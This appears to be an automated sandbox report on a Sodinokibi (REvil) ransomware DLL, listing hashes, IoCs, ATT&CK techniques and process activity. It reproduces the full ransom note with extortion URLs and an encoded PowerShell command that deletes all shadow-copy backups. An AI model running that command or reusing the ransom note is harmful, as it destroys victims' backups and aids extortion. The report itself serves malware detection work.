sodinokibi | c80ded3fe04fe8fea1439d19c87d4c451683786c5bbdf9ddee4755ccde571be1

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
03/06/2024, 03:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

906c497e67b80e785774b046e9d100bb_JaffaCakes118.dll
Size

164KB
MD5

906c497e67b80e785774b046e9d100bb
SHA1

ad42be2129e659139681b423af7558b8ee58c3c5
SHA256

c80ded3fe04fe8fea1439d19c87d4c451683786c5bbdf9ddee4755ccde571be1
SHA512

0aefd2aba8b47215309d6d3c1b90ef947ef39280b5627a32e7d51bdab5c2d9f71f77218bdaadc9475c2f7a8830e5d3116c7e245effe1b16aa1ee958580c88dd8
SSDEEP

3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfjCGfKRw+Zn7X4:veoUeZR2TRCWQFfjCGfKRw+Zn7o

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Recovery\vuy4940-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension vuy4940. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F2694BAFFECE8B6 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5F2694BAFFECE8B6 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9m+B2Ne4MoT9utgPpOMc9xXgOeVzzhnA7jWknD3UALk4wWapdvmpdwWrwBcvXO0C LJ0+Y+ID0tvpJK8PJ7Logi5q5MEi5ULbUN17RYPZKsGKcz4X9Hh8xIsNzp5CYfFp A3A2ElZqi8QKf2TvERurADYtKdYE9E05+ny5Rs/Xt2TV54hsMVf5EUboHqg54ZdS AnQzHPifpfZc8fKTB4qtm3QWR2l3mWOjP8uGmh3aAzKpcfaZUBd8zV6WPFcj3d0z vB/850i81lNVcBfANR7KB0pA3vnmYSo535fx1r5k1F9mxLhrDkG588l0AcN/Xe1U 4cwm9B5/uFcY7ktQBkaixlnsmkoM/dPGfVHj4eRvFo/qA+xIoKHR8AwtokrBGbxa QJW2MgV5lL5saKcI9JyAjXl79OIfyJkus0QjGIxjyrOKZ/lUP/DlImSKDD20ERKJ O9KIw3qxII0450EeUrhY29GQKCJ5VCc10ZbjkPE151TMfCMo/ppEsTeHzNHHz3PM f6VOigIR6H1cPyAqM6cCmMCELG//7F7Me3zshsUP1y5U0OI4OmBXNKkQ8IWF3syj R8pkw42QqxDQh/5GRDa6sHI09vIJ6L43UD1x044jUwDQs1VYnX/trCWxwt9/iVbB K4l4XPveh2AUNzslTn6wmtxujjrGDdZfGB2alNkSIeCGm7He1VzwR1gP/MnTi7TS xKb4SgVYMltXdC7ejkrC/LaapntAqaulqYrNoJUEWAuu/ezq9C2hHqu3KG30lOV9 AmW4PdSDjnN2i1CiKbE6VcREcdcq6QA6Vz+pSU+sDBesZKawwcfInAZ4xEOMws4G 4GH1K5Cem7I0JXfoqkBC6Ey9qfyulX18P359gAF51F9QyTB9kXzOyxGqUPE1tIh8 fPI1v9iL+6ykuyq4NWvGqgH57BewqycMafh5AL1yiumFUekQp6PX1WPlZoi1GT2K CtcXCQf8aBgYZ3DTlSN4S2NirumvTscDAHbbzaFrbugmexh0b637RxTVKWIyoqzH wEP32oCUVRannwQaQVShdssXz5jlEjDM0bsv41hriUNF92kLmJYb3ZkQr0t+Sf+V ffqRiCHBDvR6w56NNRGboyurkI6eUkSb3zK9wjo6294ngNiA6s9VPBxXulQh0dag PDEAiMliGKyPJcl0tpEMdtIuCgwClZzvJiRs7Gw3DAo8iVxv7ME246gVTcnR0LaE hwNUXgHNJclKtRwJPOU= Extension name: vuy4940 -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! A system of morality which is based on relative emotional values is a mere illusion, a thoroughly vulgar conception which has nothing sound in it and nothing true. Socrates

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F2694BAFFECE8B6

http://decryptor.cc/5F2694BAFFECE8B6

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\K:	rundll32.exe
File opened (read-only)	\??\R:	rundll32.exe
File opened (read-only)	\??\S:	rundll32.exe
File opened (read-only)	\??\U:	rundll32.exe
File opened (read-only)	\??\P:	rundll32.exe
File opened (read-only)	\??\D:	rundll32.exe
File opened (read-only)	\??\G:	rundll32.exe
File opened (read-only)	\??\I:	rundll32.exe
File opened (read-only)	\??\Q:	rundll32.exe
File opened (read-only)	\??\F:	rundll32.exe
File opened (read-only)	\??\B:	rundll32.exe
File opened (read-only)	\??\N:	rundll32.exe
File opened (read-only)	\??\T:	rundll32.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\W:	rundll32.exe
File opened (read-only)	\??\Y:	rundll32.exe
File opened (read-only)	\??\A:	rundll32.exe
File opened (read-only)	\??\E:	rundll32.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\Z:	rundll32.exe
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\M:	rundll32.exe

Drops file in Program Files directory 36 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\ApproveWatch.eps	rundll32.exe
File opened for modification	\??\c:\program files\ConvertUnprotect.inf	rundll32.exe
File opened for modification	\??\c:\program files\ExportNew.vsdx	rundll32.exe
File opened for modification	\??\c:\program files\RenameConfirm.TTS	rundll32.exe
File opened for modification	\??\c:\program files\RestoreLock.crw	rundll32.exe
File opened for modification	\??\c:\program files\WaitDisable.js	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\vuy4940-readme.txt	rundll32.exe
File created	\??\c:\program files (x86)\vuy4940-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\ConvertToRepair.raw	rundll32.exe
File opened for modification	\??\c:\program files\MeasureHide.xlsm	rundll32.exe
File opened for modification	\??\c:\program files\RegisterStep.nfo	rundll32.exe
File opened for modification	\??\c:\program files\SelectStart.cfg	rundll32.exe
File created	\??\c:\program files\vuy4940-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\EnterEdit.rmi	rundll32.exe
File opened for modification	\??\c:\program files\ExpandHide.mpg	rundll32.exe
File opened for modification	\??\c:\program files\UnlockMove.html	rundll32.exe
File opened for modification	\??\c:\program files\CompressHide.avi	rundll32.exe
File opened for modification	\??\c:\program files\InitializePop.rar	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\vuy4940-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\MergeEnter.wmv	rundll32.exe
File opened for modification	\??\c:\program files\StopMount.wmv	rundll32.exe
File opened for modification	\??\c:\program files\UndoCompare.au	rundll32.exe
File opened for modification	\??\c:\program files\WriteApprove.mp4	rundll32.exe
File opened for modification	\??\c:\program files\BlockLimit.tmp	rundll32.exe
File opened for modification	\??\c:\program files\CloseReceive.wav	rundll32.exe
File opened for modification	\??\c:\program files\CopyUse.vdx	rundll32.exe
File opened for modification	\??\c:\program files\HideAssert.mov	rundll32.exe
File opened for modification	\??\c:\program files\MergeConfirm.ttf	rundll32.exe
File opened for modification	\??\c:\program files\SuspendMerge.sql	rundll32.exe
File opened for modification	\??\c:\program files\CompressUnpublish.temp	rundll32.exe
File opened for modification	\??\c:\program files\ConvertToInitialize.ttf	rundll32.exe
File opened for modification	\??\c:\program files\LockStop.wmx	rundll32.exe
File opened for modification	\??\c:\program files\OutNew.mp2v	rundll32.exe
File opened for modification	\??\c:\program files\SuspendCompare.doc	rundll32.exe
File opened for modification	\??\c:\program files\WatchExit.mp4	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\vuy4940-readme.txt	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1656	rundll32.exe
2184	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1656	rundll32.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeBackupPrivilege	2792	vssvc.exe
Token: SeRestorePrivilege	2792	vssvc.exe
Token: SeAuditPrivilege	2792	vssvc.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 2008 wrote to memory of 1656	2008	rundll32.exe	28
PID 1656 wrote to memory of 2184	1656	rundll32.exe	29
PID 1656 wrote to memory of 2184	1656	rundll32.exe	29
PID 1656 wrote to memory of 2184	1656	rundll32.exe	29
PID 1656 wrote to memory of 2184	1656	rundll32.exe	29

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\906c497e67b80e785774b046e9d100bb_JaffaCakes118.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\906c497e67b80e785774b046e9d100bb_JaffaCakes118.dll,#1
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2184

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2400

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\vuy4940-readme.txt

Filesize
7KB

MD5
3e5058a96a993b7fac52c9bde18a18a3

SHA1
df5c1830e1ae12472bee1386b7caeecbc2d89689

SHA256
6c829388833f1647afcb2cb8a51a39c4544ea02044002529f15d441a80366572

SHA512
e89f3907b40189f7413221b9a473488d06b8789411cf3e3ee89d9a88bece0719f86786752d50f7ecb10a46e685ce6f6dcfa1bcfd20fec9928fc8533693686041

Download Submit
memory/2184-4-0x000007FEF5A6E000-0x000007FEF5A6F000-memory.dmp

Filesize
4KB

Download
memory/2184-5-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2184-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2184-7-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-8-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-9-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-10-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-11-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-12-0x000007FEF57B0000-0x000007FEF614D000-memory.dmp

Filesize
9.6MB

Download